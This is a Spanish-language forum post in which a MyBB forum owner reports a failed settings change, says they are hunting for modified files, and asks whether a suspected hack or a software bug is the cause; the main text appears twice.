SQL Queries: 487 / Global Parsing Time: 0.1376991 / Memory Usage: 17.5 MB
PHP version: 5.2.17 / Server Load: 5.78 / GZip Compression: Disabled
Intente activarlo pero cunado le di guardar en la pestaña de ajustes me mostro esto asi:
[Imagen: 8681.png]
osea como se ve en la imagen es como que marco un error pero no salio el mensaje, y cuando entro a ver, la opcion sigue desactivada, igual por ahora sigo clickeando en cada opcion de la web, buscando mas archivos modificados, aunque ahora ya me estoy llendo porque tengo que ir a trabajar xD seguire mas tarde buscando problemas -_-
igual como consulta es factible que esto sea realmente un intento de hack? y no una falla de mybb?
ya que tengo mybb desde octubre del año pasado, y esta es la segunda vez que pasa esto pero con diferentes codigos.
[Imagen: 8681.png]
osea como se ve en la imagen es como que marco un error pero no salio el mensaje, y cuando entro a ver, la opcion sigue desactivada, igual por ahora sigo clickeando en cada opcion de la web, buscando mas archivos modificados, aunque ahora ya me estoy llendo porque tengo que ir a trabajar xD seguire mas tarde buscando problemas -_-
igual como consulta es factible que esto sea realmente un intento de hack? y no una falla de mybb?
ya que tengo mybb desde octubre del año pasado, y esta es la segunda vez que pasa esto pero con diferentes codigos.